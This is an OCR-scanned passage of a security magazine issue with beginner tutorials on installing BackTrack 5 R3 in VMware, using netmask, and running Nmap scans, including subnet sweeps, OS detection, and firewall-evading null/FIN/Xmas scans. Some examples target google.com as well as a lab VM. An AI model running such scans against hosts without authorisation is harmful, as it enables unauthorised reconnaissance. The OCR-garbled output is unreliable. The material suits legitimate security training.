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Dear Readers, 
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R3 on VMware workstation 8. 

We would also like to thank to our friends from PenTest Magazine. We appreciate their help and we would 
like to invite you to visit their website pentestmag.com. 
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How to Install Backtrack 5 R3 on VMware 
Workstation 

by Rrajesh Kumar 

With this article you will get knowledge on how to instal BackTrack 5. But this time 
installation will be launched on Virtual Machine (VMWare). 

Step 1 . 

Go to File and click on New Virtual Machine (Figure 1). 

U bunt u - V M : : i a re Workst-ati c n 



File ] Edit View VM Tabs Help 





NewVirtual Machine,,, 


^Ctrl+N 


m 


New Window 






Open... 


Ctrl+O 




Close Tab 


CtrkW 




Connect to Server.,. 


CtrkL 


b 


Virtualize a Physical Machine... 
Export tc OVF... 






Map Virtual Disks... 






Exit 





i_J Ubuntu 



Click Here 



this virtual machine 



I machine settings 



1 GB 
1 

(SCSI) 10 GB 
CD/DVD (IDE) Using drive G; 

I 3 Cl-.^.^,, rt...+ „ .-I _4- .-.,+. 




Figure 1. Creating a new virtual machine 

Step 2. 

Select Typical and click Next (Figure 2). 

New Virtual Machine Wizard 



J3_| 



VMware* 

Workstation 



Welcome to the New Virtual 
Machine Wizard 

What type of configuration do you want? 

o Typical [recommended) 

Create a Workstation 8,0 virtual machine 
in a few easy steps, 

■ j Custom [advanced) 

Create a virtual machine with advanced 
options, such as a SCSI controller type, 
virtual disk type and compatibility with 
older VMware products. 



Click Here 



Help 



Next > *~~] Cancel 



Figure 2. Selecting the type of configuration 
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Step 3. 

Select DVD drive or ISO and click Next (Figure 3). 





sreto search 



iomputer 
Ibuntu 

Windows XP Prcfessio 



Ed VMs 



|Hl Documents 
dp Music 
B Pictures 
9 Videos 

" 1 " Computer 
^ Local Disk (C:) 
a Local LJisk (L>:J 
Local Disk. (EO 



G u e i L Opera LI i ly 5y sle 1 1 1 Ii i std I Id Liui i 

A virtual machine is like a physical computer; it nee-ds an operating 
system. How will you install the guest operating system ? 



Install from: 


If you have Backtrack OS 


1 Instafer disc: 


On Disk then select this 






| DVD RW Drive (F:) 



if you have ISO file on your Hard 
Disk then click on browser 



o Installer disc image file Ceo]: 



h;f(£M Software lfedora-18-x86_641ive-Desktop.t 




Windows 7 All In One Pre-actrvated 


5/4/2012 10:19 AM 


File folder 




H Windows 7 Ultimate 


5/4/2012 10:21 AM 


File folder 




. Wind owsS Pro 


9/11/2013 10:49 AM 


File folder 




BliRi-KUb -32 ^ 


UJ/9/2U12 3:22 AM 


WinZip hie 


ij' 


EJ Matriux-Ec-Centf!lr>v2.49rj 


10/9/20126:30 AM 


WinZip File 


2,8! 


^ Ubuntu lllO DeskJV i38S 


12/1/2011 320 AM 


WinZip File 


7! 


^3) Windows XP Professic\al 5P3 November .. 


11/23/20112:26 PM 


WinZip File 


5: 



In this window First Select BT5 
Iso file then click on Open 



Filename: BT5F13-KDE-32 



CD-ROM images Cisn] 



Oppn 



fanrpl 



Figure 3. Selecting the information source 



Step 4. 

Click on Next (Figure 4). 

New Virtual Machine Wizard 



Guest Operating System Installation 

A virtual machine is like a physical computer; it needs an operating 
system, How will you install the guest operating system? 



Install from: 

Installer disc: 



^ DVD RW Drive (F:) 



Installer disc image file [iso): 



D : ^Raj 1 \Operatjng Systems 1BT5R 3 -KDE -3 2, iso ■» Browse . 

;\ Could not detect which operating system is in this disc image, 
You will need to specify which operating system will be installed, 

I will install the operating system later. 

The virtual machine will be created with a blank hard disk. 



Help 



[ < Back Next > ] [ Cancel 



Figure 4. Continuing installation 



8 



Kali Linux 



Step 5. 



Select Linux, choose your OS version (Ubuntu), and click Next (Figure 5). 



New Virtual Machine Wizard 



S3 



Select a Guest Operating System 

Which operating system will be installed on this virtual machine? 



Guest operating system 

i_) Microsoft Windows 
''*> Linux 

3 Novell NetWare 

Sun Solaris 
; VMware ESX 
Other 

Version 



Ubuntu 



ft 



Help 



< Back 



Next 



> Cancel 



Figure 5. Specifying the OS that will be installed 



Step 6. 



You can change your virtual machine name and choose where do you want to install your OS (Figure 6). 

New Virtual Machine Wizard 



Name the Virtual Machine 

What name mould you like to use for this virtual machine? 



Virtual machine name: 



Ubuntu 



Location: 



Di'^ack 

The default location can be changed at Edit > 



Browse. 



Preferences 



If you want to change 
your location click on 
browser 



Click Here 



< Back Next > Cancel 



Figure 6. Setting the name and installation path 
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Step 7. 

Change your OS installation disk size (it should be more than 20 GB) and click Next (Figure 7). 



New Virtual Machine Wizard 



£3 



Specify Disk Ca pa city 

How large do you want this disk to be? 



The virtual machine's hard disk is stored as one or more files on the host 
computer's physical disk. These filefs) start small and become larger as you 
add applications, files, and data to your virtual machine, 



1. You can resize your 
disk 



Maximum disk size (GB): 11,0 M 

Recommended size for Ubuntu: 20 GB 

O Store virtual disk as a single file 
* Split virtual disk into multiple files 

Splitting the disk makes it easier to move the virtual machine to another 
computer but may reduce performance with very large disks. 



2. Click Next 



Help 



Figure 7. Changing installation disk size 

Step 8. 

Click on Finish (Figure 8). 

Ne;v Virtu a! Machine Wizard 



S3 



Ready to Create Virtual Machine 

Click Finish to create the virtual machine and start installing Ubuntu, 



The virtual machine will be created with the following settings: 



Name: 


Ubuntu 




> 


Location: 


D:\back 






Version: 


Workstation 8.0 






Operating Syst... 


Ubuntu 






Hard Disk: 


11 GB, Split 






Memory: 


1024 MB 








in 







Customize Hardware, 



L If you want to customize 
harriwarp elk k hprp 



< Back | [ Next^^] [ Cancel ~| 



N71 Power on this virtual machine after creation 



1 2. Click finish 



< Back 



Finish 



Cancel 



Figure 8. Ready to create the VM 
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Step 9. 



Select Text Mode and hit Enter (Figure 9). 




Backtrack Liue CD 



kTrack Text - Default Boot Text Mode 



Bock Track Stealth - No Networking enabled 
BackTrack Forensics - No Driue rrr-^iiaja^Jlount Iselectthis and press enter 

Back Track noDRM - No DRM Driuers ^Tt 

BackTrack Debug - Safe Mode 

BackTrack Mentest - Bun meritest-*"*^ 

Hard Driue Boot - boot the first hard dilk 



< back I track ^ 



Press [Tab] to edit options 



Figure 9. Boot mode select 

Step 1 0. 

After booting your ISO, a screen similar to Figure 10 will show. Type startx and hit Enter. 



[ 2.577376] sd 2:0:0:0: [sda] Assuming driue cache: write through 
[ 2.581697] sd 2:0:0:0: [sda] Attached SCSI disk 
[ 2.627458] hub 2-2:1.0: USB hub found 
[ 2.628203] hub 2-2:1.0: 7 ports detected 

[ 2.643985] input: UMuare UMuare Uirtual USB Mouse as /deuices/pciOOOO :00/0G 
/2- 1/2- 1 : 1 . 0/ i nput/ i nput2 

[ 2.649713] generic-usb 0003 :0E0F : 0003 .0001 : input, hidrauO : USB HID ul.10 Mc 
SB Mouse] on usb-0000 : 02 : 00 .0-1/ inputO 

[ 2.656054] input: UMuare UMuare Uirtual USB Mouse as /deuices/pciOOOO :00/0G 
/2- 1/2- 1 : 1 . 1/ i nput/ i nput3 

[ 2.662611] generic-usb 0003 :0E0F : 0003 .0002 : input, h idraul : USB HID ul.10 Mc 
SB Mouse] on usb-0000 : 02 : 00 .0-1/ inputl 

[ 2.667937] usbcore : registered neu interface driuer usbhid 
[ 2.668084] usbhid: USB HID core driuer 

Linux bt 3.2.6 #1 SMF Fri Feb 17 10:40:05 EST 2012 i686 GMU/Linux 

System information disabled due to load higher than 1.0 
rootebt : ~tt startx ^ - s 



Figure 10. Screen visible after booting. 



Step 1 1 . 

Loading (Figure 11). 




Figure 11. Loading 
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Step 1 2. 



Right click on the Install BackTrack icon and click Open (Figure 12). 




Figure 12. Opening installation 



Step 13. 

Click Forward (Figure 13). 




Espanol 

Esperanto 

Euskara 

Francais 

Gaeilge 

Galego 

Hrvatski 



Ready to install? Once you answer a few questions, the 
contents of the live CD can be installed on this computer 
so you can run BackTrack Live at full speed without the CD, 

Answering the questions should only take a few minutes, 



Latviski 

Lietuviskai 

Magyar 



Step 1 of 7 



^ Forward 



Figure 13. Step 1 - starting installation 
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Step 1 4. 

Click Forward (Figure 14). 




Figure 14. Choosing your location 



Step 1 5. 

Click Forward (Figure 15). 




Figure 15. Keyboard layout selection 
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Step 1 6. 



Here, we are choosing Erase and use entire disk because we have created a separate partition for our BT OS 
installation. This is good for installing OS on VMware. Click on Forward (Figure 16). 



Prepare disk space 



This computer has no operating systems on it, 



Where do you want to put BackTrack Live? 
0 Erase and use the entire disk 



SCSI3 (0,0,0 



O Specify partitio 




Figure 16. Preparing disk space 



Step 1 7. 

Click on Install (Figure 17). 



Install v x 

Ready to install 

Your new operating system will now be installed with the following settings: 




Figure 1 7. Ready to install 
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Step 1 8. 

Installation starts (Figure 18). 




Figure 18. Installation starts 

Step 1 9. 

Installation completed. Click on Restart Now (Figure 19). 



Installation Complete v 

Installation has finished. You can continue testing 
Ubuntu now. but until you restart the computer, any 
changes you make or documents you save will not be 
preserved. 



Continue Testing 



Restart Now 



Figure 19. Installation complete 



Step 20. 



Now login with root and hit Enter. Our password will be toor (Figure 20). 



:02:00.0-l/input0 



I Z. 843078] sda: sdal sda2 < sda5 > 

I 2.853351] sd 2:0:0:0: [sda] Cache data unavailable 

[ 2.859335] sd 2:0:0:0: [sda] Assuming driue cache: urite th 

[ 2.862858] sd 2:0:0:0: [sda] Attached SCSI disk 

[ 2.876663] input: UMuare UMuare Uirtual USB Mouse as /deuic 

put3 

[ 2.895199] generic-usb 0003 : 0E0F : 0003 . 0002 : input jhidraul : 
:02:00.0-l/inputl 

[ 2.907469] usbcore: registered neu interface driuer usbhid 
[ 2.911777] usbhid: USB HID core driver 

/opt/metasploit/postgresql/scr ipts/ctl .sh : postgresql started 
/opt/metasploit/postgresql/scr ipts/ctl .sh : postgresql (pid 12 
LOG: database system uas shut doun at 2012-08-10 20:24:34 1ST 

Back Track 5 R3 - 32 Bit bt ttyl 

bt login: LOG: database system is ready to accept connections 



Back Track 5 R3 - 32 Bit bt ttyl 
bt login: root 
Passuord : 



Figure 20. Setting login and password 
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Step 21 . 



Write startx and hit Enter (Figure 21). 



Back Track 5 R3 - 3Z Bit bt ttyl 
bt login: root 
Password : 

Linux bt 3.Z.6 Si SMP Fri Feb 17 10:40:05 EST Z01Z i6E 

System information as of Sat Jun 1 20:11:11 1ST Z01 

System load: 0.4Z Processes: 
Usage of /: 57. 5/. of 19.06GB Users logged in: 
Memory usage : Zv. IP address for ethC 

Suap usage : 0y. 

Graph this data and manage this system at https://le 
root0bt:~tt startx 



Figure 21. startx 



Step 22. 



Now, right click and delete the installation icon form your desktop (Figure 22). 




Figure 22. Deleting the installation icon 
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How to Use Netmask in Kali Linux 

by Rrajesh Kumar 

Netmask is another simple tool which does one thing and that is, makes a ICMP netmask 
request. By determining the netmasks of various computers on a network, you can better map 
your subnet structure (www.question-defense.com). 

Step 1 . How to open 

A. GUI Method (Figure 1). 

Applications —►Kali Linux — > Information Gathering 



Route Analysis —> netmask 




Top 10 Security Tools 



Uj Office 
m Programming 
{|j Sound & Videu 
iQ£ System Tools 



ormation Gatherinq 



* tl Vulnerability Analysis 
q^Jt Wet> Applications 
Password Attacks 
Wirpipss: Attacks 

> Exploitation Tools 
* C^J Sniffing/Spoofing 

> ^ Maintaining Access 

> Reverse Engineering 
£]j Stress lesting 

> Q Hardware Hacking 

> ^Jf Ff>rpn*iif*i 

>■ Repui Liny Tuulb 

> tf^" System Services 



Q*. DNS Analysis 
> IDS/IPS Identification 

0\ Live Host Identification 
Network Scanners 
Ob fingerprinting 
OSIWT AnaLysis 



RnutP Anal ysis 



5ei vke Finyt;i i n Ling 
Q\ 5MD Analysis 

SMTP Analysis 
C\ SNMP Analysis 
Qy bbL Analysis 



Click Here 



Telephony AnaLysis 
Traffic Analysis 

t\ VoIP AnaLybib 

Qs> VPN Analysis 



1 








1 








1 








1 






■ 






1 






i 0tf3fp 


> dnmap-cLiant 


> dnmap-server 


£ intrace 


^ netmask 


J traceb 






■ 




1 





Figure 1. Opening netmask in the GUI 

B. Open the terminal and type netmask -h. This command will open netmask with help options (Figure 2). 



:y :~# netmask -h 
This is netmask, an address 


1 

netmask generation utility 


Usage : 


netmask spec [spe 


c . . 


.] 


-h, - 


-help 




Print a summary of the options 


-v, - 


-version 




Print the version number 


d. - 


-debug 




Print status/progress information 


-s, - 


-standard 




Output address/netmask pairs 


-c , - 


-cid r 




Output CIDR format address lists 


-i . - 


-cisco 




Output Cisco style address lists 


- f, - 


- range 




Output ip address ranges 


-x, - 


-hex 




Output address/netmask pairs in hex 


-o, - 


-octal 




Output address/netmask pairs in octal 


-b, - 


-binary 




Output address/netmask pairs in binary 


-n, - 


-nodns 




Disable DNS lookups for addresses 


Definitions : 






a spec can be any of: 






add ress 






address : add ress 






add ress : +add ress 






adc 


ress/mask 






an address can be any 


of: 


1 


N 


decimal 


numb 


er 


QN 

OxP 


octal number 
hex number 


1 



Figure 2. Opening netmask in the terminal 
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Step 2. 

-v - this command is used to see the netmask version which is installed in your system (Figure 3). 

Syntax - netmask -v 



FiLe Edit View Search Terminal. HeLp 


y : ~# netmask 
netmask, version 2.3.7 

' 1 


-u 



Figure 3. Checking the netmask version 



Step 3. 

This is the default search for a domain or IP (Figure 4). 

Syntax — netmask domain/IP 
Example — netmask google.com 



Example - netmask 192.168.237.129 



FiLe Edit View Search Terminal. HeLp 


y : ~# netmask 
74.125.236.73/32 

y:~# netmask 
192.168.237.129/32 
:-# | 


google .com 
192.168.237.12 


9 



Figure 4. Search for domain or IP 
Step 4. 

Output address/netmask pairs (Figure 5). 



Syntax — netmask -s domain/IP 
Example — netmask -s google.com 
Example - netmask -s 192.168.237.129 



FiLe Edit View Search TerminaL HeLp 



y :~# netmask -s 


google .com 


74 . 125.236 . 192/255 .255 .255 


255 


y :~# netmask -s 


192.168.237.129 


192 . 168 .237 . 129/255 .255 .255 


255 







Figure 5. Output address/netmask pairs 
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Step 5. 

Output CIDR format address lists (Figure 6). 

Syntax — netmask -c domain/IP 
Example — netmask -c google.com 
Example - netmask -c 192.168.237.129 



FiLe Edit View Search TerminaL 


HeLp 


y:~# netmask -c gc 


ogle .com 


74.125.236.65/32 




y:~# netmask -c 192.168.237.129 


192.168.237.129/32 









Figure 6. Output CIDR format address lists 



Step 6. 

Output Cisco style address lists (Figure 7). 

Syntax — netmask -i domain/IP 
Example — netmask -i google.com 
Example - netmask -i 192.168.237.129 



FiLe Edit View Search TerminaL HeLp 


v netmask 
74.125.236.67 0.0.0.6 
:~# netmask 
192.168.237.129 0.0.0.0 


-i google.com 

-i 192.168.237.129 



Figure 7. Output Cisco style address lists 



Step 7. 

Output IP address ranges (Figure 8). 

Syntax — netmask -r domain/IP 
Example — netmask -r google.com 
Example - netmask -r 192.168.237.129 
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root@MrQuiety: " 

FiLe Edit View Search TerminaL HeLp 



ety:~# netmask -r google.com 
74 . 125 .236 . 174-74 . 125 .236 .174 [1] 

rQuiety:~# netmask -r 192.168.237.129 
192.168.237.129-192.168.237.129 [1) 



Figure 8. Output IP address ranges 



FiLe Edit View Search TerminaL HeLp 



Juiety:-# netmask -x google.com 
0x4a7dec67/0xffffffff 

lrQuiety:~# netmask -x 192.168.23 
0xc0a8ed81/Gxffffffff 

root@MrQuiety : ~# 



.237.129 



Figure 9. Output address/netmask pairs in hex 



FiLe Edit View Search TerminaL HeLp 



rQuiety:~# netmask -o google.com 
011237366107/G37777777777 

rQuiety:~# netmask -o 192.168.237.129 
030052166601/037777777777 

root^HrQuiety :~# 



Figure 10. Output address/netmask pairs in octal 



FiLe Edit View Search TerminaL HeLp 



rootQMri. netmask -b googlG.com 

310Q101G 01111101 1110110O 11000000 / 11111111 11111111 11111111 11111111 

lrquiety:~# netmask -b 192.168.237.129 

11000000 10101000 11101101 10000001 / 11111111 11111111 11111111 11111111 

y :~# | 



Figure 11. Output address/netmask pairs in binary 



21 



Kali Linux 



How to Use Nmap in Kali Linux 

by Rrajesh Kumar 

Nmap ("Network Mapper") is an open source tool for network exploration and security 
auditing. It was designed to rapidly scan large networks, although it works fine against single 
hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the 
network, what services (application name and version) those hosts are offering, what operating 
systems (and OS versions) they are running, what type of packet filters/firewalls are in use, 
and dozens of other characteristics. While Nmap is commonly used for security audits, many 
systems and network administrators find it useful for routine tasks such as network inventory, 
managing service upgrade schedules, and monitoring host or service uptime (nmap.org). 

Step 1 . How to open nmap 

A. GUI method (Figure 1). 

Applications —> Information Gathering —> DNS Analysis — > nmap 
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Figure 1. Opening nmap in the GUI 

B. Open the terminal, type nmap, and hit Enter (Figure 2). 



rr:i „ rr J : +- \r\ ., c — u -r : - 1 i i . . i — 



root@MrQuiety : ~# nmap 

Nmap 6.25 ( http://nmap.org ) 

Usage: nmap [Scan Type(s)] [Options] {target specification} 
TARGET SPECIFICATION: 

Can pass hostnames, IP addresses, networks, etc. 

Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10 . & . 0 -255 . 1 -254 
-il_ <input f ilename> : Input from list of hosts/networks 
-iR <num hosts>: Choose random targets 

--exclude <host 1 [ , host2] [ , host3] , . . . > : Exclude hosts/networks 
- -excludef ile <exclude_f ile> : Exclude list from file 
HOST DISCOVERY: 

-sL: List Scan - simply list targets to scan 
-sn: Ping Scan - disable port scan 

-Pn: Treat all hosts as online -- skip host discovery 

-PS/PA/PU/PY[portlist] : TCP SYN/ACK , UDP or SCTP discovery to given ports 
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
-PO[protocol list] : IP Protocol Ping 

-n/-R: Never do DNS resolution/Always resolve [default: sometimes] 
- -dns -se rve rs <servl[ ,serv2] ,...>: Specify custom DNS servers 
- -system -dns : Use OS's DNS resolver 
- -t race route : Trace hop path to each host 
SCAN TECHNIQUES: 



Figure 2. Opening nmap in the terminal 
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Step 2. 



Scan a single IP address when the firewall is OFF/ON on the target PC (Figure 3). 

Syntax — nmap IP address/hostname 
Example - nmap 192.168.237.129 
Example — nmap google . com 



Fila EdiL Vi«w Sedr ch T«i niiridL Help 



root@Mrt)ulety:-g!r nmap 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-61 19:67 1ST 
Nmap scan report for 192 . 1G8 .237 . 129 
Host Is up (S.eei3s latency). 

Not shown: 99G closed ports Target PC's firewall Off 

PORT STATE SERVICE 

135/tcp open ms rpc 

139/tep open nctbios-ssn 

44G/tcp open mic rosof t -ds 

3389/tcp open ms-wbt -sc rvc r 

MAC Address: 00 :0C :29 :BQ :E3 :F3 (VMwere) 

Nmap done: 1 IP address [1 host up) scanned in 2.27 seconds 
>T(dHl" :--# nmap 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013 12 61 19:67 1ST 
Nmap scan report for 192 . 1G8 .237 . 129 
Host is up 0. 00098s latency). 

Not shown: 999 filtered ports Target PC'S firewall ON 

PORT STATE SERVICE 

3389/tcp open ms-wbt-SQrvQr 

MAC Address: 00 :0C : 29 :B0 :E3 :F3 (VMware) 

Nmap done: 1 IP address [1 host up) scanned in 7.14 seconds 
i uuL@Hi OuifLy :~# | 



Figure 3. Scanning a single IP address with the firewall ON/OFF 



Step 3. 



Boost up your nmap scan - using this command you can decrease scan time (Figure 4). 

Syntax — nmap -F IP address 
Example - nmap -F 192.168.237.129 
File Edit View Search Terminal Help 



i oo UJMi Quie Ly z~W nmap 192.168.237.129 

Slariing Nntap 6.25 ( http://nntac.org ) at 2013-12-61 19:68 1ST 
Nmap scan leporL Tor 192.168.237.129 
Host is up (3. 0911s latency). 
Not shown: 99G closed ports 



PUKI SIAlb StKVlCb 

13 L _>/tcp open ms rpc 

ljy/tcp open netbias-ssn 

44h/t^p open mirrosot 



Normal Scan 



ljy/tcp open netbios-ssn 
44h/t^p open mirrasntt-ris 
r3."in9/tr:p open ms-whT-server 
MAC Address: 0H :fiC : ?f3 :BH :F3 :F3 (1/Mw.nrp] 



Nmap don-e : 1 IP address [1 host up) scannec 
ttuicty :-# nmap F 192.168.237.129 



in 3.63 seconds 



Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:09 I 
Nmap scan report ("or 192 .168.237. 12S 
HusL is up (O.SS12s latency). 
Nol shown: 96 clossd ports 
PORT STATE SERVICE 

135/tep open rasrpc Fast Scan 

lijy/tcp open netbios-ssn 

44 L j/tcp open mic rosott -ds 

3389/tcp open ms-wbt-server 

MAC Address: Q@ :0C : 23 :BftsE3 :F3 (VMwnrp) 

Nmap done: 1 TP address (1 host up) scanned in 7 . 7Si seconds 
rnorwMrQu-i rty :~# ■ 



Figure 4. Decreasing scan time 
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Step 4. 



Scan multiple IP addresses or subnet. 

A. Scan a range of IP addresses (Figure 5). 

Syntax — nmap IP address range 

Example - nmap 192.168.237.1-130 
FiLe Edit View Search Terminal. HeLp 



root@MrQuiety :~# nmap 182. 168 . 237 .1- -138 

Starting Nmap 6.25 ( http://nmap.org ] at 2613-12-61 19:16 1ST 
Nmap scan report for 192.168.237.1 
Host is up (6.6613s latency) . 

All 1666 scanned ports on 192.168.237.1 are filtered 
MAC Address: 66:56:56:06:66:68 (VMware) 

Nmap scan report for 192.168.237.2 
Host is up (0.06674s latency). 
Not shown: 999 closed ports 
P6RT STATE SERVICE 

53/tcp filtered domain 

MAC Address: 66 : 56 : 56 : ED : D4 : DE [VMware) 

Nmap scan report for 192.168.237.128 
Host is up (6.6666265 latency). 

All 1666 scanned ports on 192.168.237.128 are closed 

Nmap scan report for 192.168.237.129 

Host is up (6. 6612s latency). 

Not shown: 996 closed ports 

PDR.T STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft -ds 

3389/tcp open ms -wbt -se rve r 

MAC Address: 66 : 6C : 29 : B6 : E3 : F3 (VMware) 

Nmap done: 136 IP addresses (4 hosts up) scanned in 11.86 seconds 



Figure 5. Scanning a range of IPs 

B. Scan a range of IP addresses using a wildcard (Figure 6). 

Example - nmap 192.168.237.* 
FiLe Edit View Search Terminal. HeLp 



rQuiety:~# nmap 192.168.237.' 



Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:12 1ST 
Nmap scan report for 192.168.237.1 
Host is up (6.0073s latency) . 

All ISO© scanned ports on 192.168.237.1 are filtered 
MAC Address: 00 : 5Q : 56 : C0 : 00 : 08 (VMware) 

Nmap scan report for 192.168.237.2 
Host is up (0.00070s latency) . 
Not shown: 999 closed ports 
PORT STATE SERVICE 
53/tcp open domain 

MAC Address: 00 : 50 : 56 : ED : D4 : DE (VMware) 

Nmap scan report for 192.168.237.128 
Host is up [0.000021s latency) . 

All lOOO scanned ports on 192.168.237.128 are closed 

Nmap scan report for 192.168.237.129 

Host is up (0.0010s latency) . 

Not shown: 996 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open mic rosoft -ds 

3389/tcp open ms -wbt -se rve r 

MAC Address: 00 : OC : 29 : B0 : E3 : F3 [VMware) 



Figure 6. Scanning a range of IPs using wildcard 
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C. Scan an entire subnet (Figure 7). 

Example - nmap 192.168.237.0/24 
FiLe Edit View Search Terminal. Help 



rQuiety:~# nmap 192.168.237.9/24 

Starting Nmap 6.25 ( http://nmap.org ] at 2913-12-01 19:13 1ST 
Nmap scan report for 192.168.237.1 
Host is up (0.0958s latency). 

ATI 1600 scanned ports on 192.168.237.1 are filtered 
MAC Address: G0 :5S :56 :CS :QQ :G8 (VMware) 

Nmap scan report for 192.168.237.2 
Host is up (0.00091s latency). 
Not shown: 999 closed ports 
PORT STATE SERVICE 
53/tcp open domain 

MAC Address: 00 : 50 : 56 : ED : D4 : DE (VMware] 

Nmap scan report for 192.168.237.128 
Host is up (0.000020s latency). 

All 1000 scanned ports on 192.168.237.128 are closed 

Nmap scan report for 192.168.237.129 
Host is up (0.0014s latency). 
Not shown: 996 closed ports 
PORT STATE SERVICE 
135/tcp open msrpc 



139/tcp 



netbios-ssn 



445/tcp open microsoft -ds 
3389/tcp open ms -wbt -se rve r 



MAC Address: 



i:0C:29:B0:E3:F3 (VMware) 



Figure 7. Scanning entire subnet 



Step 5. 



This command is used to scan OS and version detection (Figure 8). 

Example - nmap -0 192.168.237.129 
File Edit View Search Terminal Help 



iety:~# nmap -0 192. 168. 237 .129 

Starting Nmap 6.25 ( http://nmap.org ) at 2613-12-01 19:14 1ST 

Nmap scan report for 192.168.237.129 

Host is up (0.00096s latency) . 

Not shown: 996 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open notbios-ssn 

445/tcp open microsoft -ds 

,3389/tcp open ms-wbt -server 

'MAC Address: 66 : 0C:29 :B0 :E3:F3 (VMware) 

Device type: general purpose 

Running: Microsoft Windows XP | 2903 

OS CPE: cpe:/o : microsoft :windows_xp: :sp2 : professional cpe:/o :mic rosoft :windows_s 
erver_2003 

OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 
Network Distance: 1 hop 



OS detection performed. Please report any incorrect results at http://nraap . o rg/s 
ubntit/ . 

Nmap done: 1 IP address (1 host up) scanned in 6.88 seconds 



Figure 8. Scanning OS and itsversion 
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Step 6. 



Scan all TCP ports in the target IP (Figure 9). 

Example - nmap -sT 192.168.237.129 
File Edit View Search Terminal. HeLp 



root@MrQuiety :~# nmap -sT 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 28.13-12-01 19:15 1ST 

Nmap scan report for 192.168.237.129 

Host is up (0.916s latency) . 

Not shown: 996 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open mic rosof t -ds 

3389/tcp open ins -wbt -se rve r 

MAC Address: QQ : GC : 29 : BQ : E3 :F3 (VMwamJ 

Nmap done: 1 IP address [1 host up) scanned in 1.70 seconds 
:~# | 



Figure 9. Scanning all TCP ports in target IP 



Step 7. 



Scan a firewall for security weakness. 

A. Null scan - use TCP null scan to fool a firewall to generate a response (Figure 10). 

Example - nmap -sN 192.168.237.129 

B. Fin scan - use TCP Fin scan to check the firewall (Figure 10). 

Example - nmap -sF 192.168.237.129 

C. Use TCP Xmas scan to check firewall (Figure 10). 

Example- nmap -sX 192.168.237.129 
File Edit View Search Terminal. HeLp 



root<aMrQuiety : ~# nmap -sN 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:16 1ST 
Nmap scan report for 192.168.237.129 

Host is up (Q.QQlls latency) . A 
All 10O0 scanned ports on 192.168.237.129 are closed 
MAC Address: 00 : 0C : 29 : B0 : E3 : F3 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds 

root@HrQLiiet:y : ~# nmap -sF 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:16 1ST 
Nmap scan report for 192.168.237.129 

Host is up (0.0010s latency) . B 
All 1000 scanned ports on 192.168.237.129 are closed 
MAC Address: 00 : 0C : 29 : B0 : E3 : F3 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds 

rootgHrQuiety:-* nmap -sX 192 . 168 . 237 . 129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:16 1ST 
Nmap scan report for 192.168.237.129 

Host is up (0.0011s latency) . C 
All 1000 scanned ports on 192.168.237.129 are closed 
MAC Address: 00 : 0C : 29 : B0 : E3 : F3 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds 
oot<aMrQu±ety : ~# | 



Figure 10. Null, TCP Fin, and TCP Xmas scans 
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Step 8. 

UDP scan - scan a host for UDP services. This scan is used to view open UDP ports (Figure 11). 

Example - nmap -sU 192.168.237.129 
File Edit View Search Terminal. Help 



:-# nmap -sU 192.168.237.129 



Starting Nmap 6.25 ( http://nmap.org ) at 2613-12-01 19:17 1ST 

Nmap scan report for 192.168.237.129 

Host is up (0.0035s latency). 

Not shown: 993 closed ports 

PORT STATE SERVICE 

123/udp open ntp 

137/udp open netbios-ns 

138/udp open | filtered netbios-dgrn 

445/udp open | filtered microsoft -ds 

500/udp open | filtered isakmp 

1900/udp open I filtered upnp 

4500/udp open j filtered nat-t-ike 

MAC Address: 00 : OC :29 :B0 : E3 :F3 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds 
:-# | 



Figure 11. UDP scan 

Step 9. 

Scan for IP protocol - this type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) 
are supported by target machines (Figure 12). 

Example - nmap -SO 192.168.237.129 
File Edit View Search Terminal Help 



it@MrQuiety :~# nmap -sO 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-61 19: 

Nmap scan report for 192.168.237.129 

Host is up (6.06064s latency) . 

Not shown: 252 open | filte red protocols 



PROTOCOL 


STATE 


SERVICE 


1 


open 


icmp 


6 


open 


tcp 


17 


open 


udp 


132 


closed 


sctp 



MAC Address: 00 :0C :29 :B0 :E3 :F3 (VMware) 

Nmap done: 1 IP address [1 host up] scanned in 2.41 seconds 

root@HrQuiety :~# 



Figure 12. Scan for IP protocol 

Step 1 0. 

Detect remote services (server/domain) version numbers (Figure 13). 

Example - nmap -sV 192.168.237.129 
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root@HrOuiety:~# nmap -sV 192.168.237.129 

Starting Nmap 6.25 [ http://nmap.org ] at 2Q13-12-01 19:19 1ST 

Nmap scan report for 192.158.237.129 

Host is up (0.G014s latency). 

Not shown: 996 closed ports 

PORT STATE SERVICE VERSION 

135/tcp open msrpc Microsoft Windows RPC 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 

3389/tcp open ms-wbt -server Microsoft Terminal Service 

MAC Address: B8:SC :29 :BS :E3:F3 (vMware) 

Service Info: OS: Windows; CPE: cpe : /o :mic rosoft :windows 



Service detection performed. Please report any incorrect results at http ://nmap . 
o rg/submit/ . 

Nmap done: 1 IP address (1 host up) scanned in IS. 04 seconds 
:-# | 



Figure 13. Detecting remote services 

Step 1 1 . 

Find out the most commonly used TCP ports using TCP SYN Scan. 
